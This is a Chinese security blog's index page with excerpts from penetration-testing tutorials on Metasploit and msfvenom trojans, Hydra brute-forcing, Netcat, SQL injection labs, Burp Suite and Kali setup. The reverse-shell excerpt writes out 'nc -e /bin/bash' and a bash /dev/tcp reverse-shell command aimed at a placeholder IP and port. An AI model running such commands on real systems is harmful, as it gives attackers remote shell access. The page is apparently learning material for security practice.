Junglezt的博客

摘要： meterpreter是metasploit中的一个杀手锏，通常在漏洞利用成功后，会返回给攻击者一个攻击通道，其中有很多自动化操作 场景布置 生成木马 首先，我们使用metasploit中的另一个后门工具msfvenom生成一个木马，方便我们测试meterpreter msfvenom -p win 阅读全文

摘要： msfconsole是metasploit中的一个工具； msfconsole集成了很多漏洞的利用的脚本，并且使用起来很简单的网络安全工具 在终端输入msfconsole命令即可进入msf的控制台，msf控制台集成了很多其他程序接口，例如nmap，sqlmap可以在msf控制台中使用 可以看到每个分 阅读全文

摘要： Hydra 在爆破工具中，hydra可是数一数二的存在，是著名黑客组织thc开发的一款开源的暴力密码破解工具，可以在线破解多种密码 Hydra 能够暴力破解以下协议：Asterisk、AFP、Cisco AAA、Cisco auth、Cisco enable、CVS、Firebird、FTP、HTT 阅读全文

摘要： 反弹shell一般利用在命令执行漏洞中 在Netcat的学习中我们学习了如何使用nc -e /bin/bash反弹shell 这里分享一些除了nc以外其他的反弹方式 Bash反弹shell bash -i >& /dev/tcp/IP地址/端口 0>&1 /dev/tcp,udp,host,port 阅读全文

摘要： NetCat瑞士军刀，网络中的瑞士军刀，短小而精悍，功能齐全。简称为nc 端口扫描 参数 作用 -v 扫描端口是否开放 -z 指定端口范围 -w 指定扫描时间 -u 指定udp端口 例如：查看172.16.1.80的21端口是否开启 nc -v 172.16.1.80 21 扫描172.16.1.8 阅读全文

摘要： 主机发现工具 当我们加入一个网段时，不知道该网段主机存活的数量，首先我们要先进行主机存活发现 ping ping命令通常用户查看网络连接状态；得到服务器的IP地址，还有网络连接的延迟，另外可以通过TTL判断出目标的操作系统，在网上的服务器中，一般该值都被修改 在linux中，ping命令会一直进行p 阅读全文

摘要： upload-labs是一个练习文件上传的靶场 我们需要先安装中间件和PHP，推荐使用小皮面板，如何安装使用见sqli-labs搭建前部分 upload-labs下载:https://gitcode.net/mirrors/c0ny1/upload-labs/-/archive/master/upl 阅读全文

摘要： 补坑：报错注入 当我们 union 无法注入的时候，可以使用报错注入，这里我们有三种报错注入，xpth语法错误和count()+rand()+floor()+group by重复组建错误 extractvalue()函数 extractvalue()函数是对XML语法进行读取查看的函数，就例如我们熟 阅读全文

摘要： 设置文字大小 burpsuite安装好后，有些时候文字非常的小，看的眼睛直接痛死。 找到 User options -> Display 其中 User Interface -> Font size 设置burpsuite主题文字大小 其中 HTTP Message Display -> Font 阅读全文

摘要： 配置apt源地址 kali 自带的apt源是国外的，更新网速很慢，这里我设置的是中科大的源. http://mirrors.ustc.edu.cn/help/kali.html 1.复制页面的源地址 2.打开kali终端,输入命令sudo vim /etc/apt/sources.list 一直摁下 阅读全文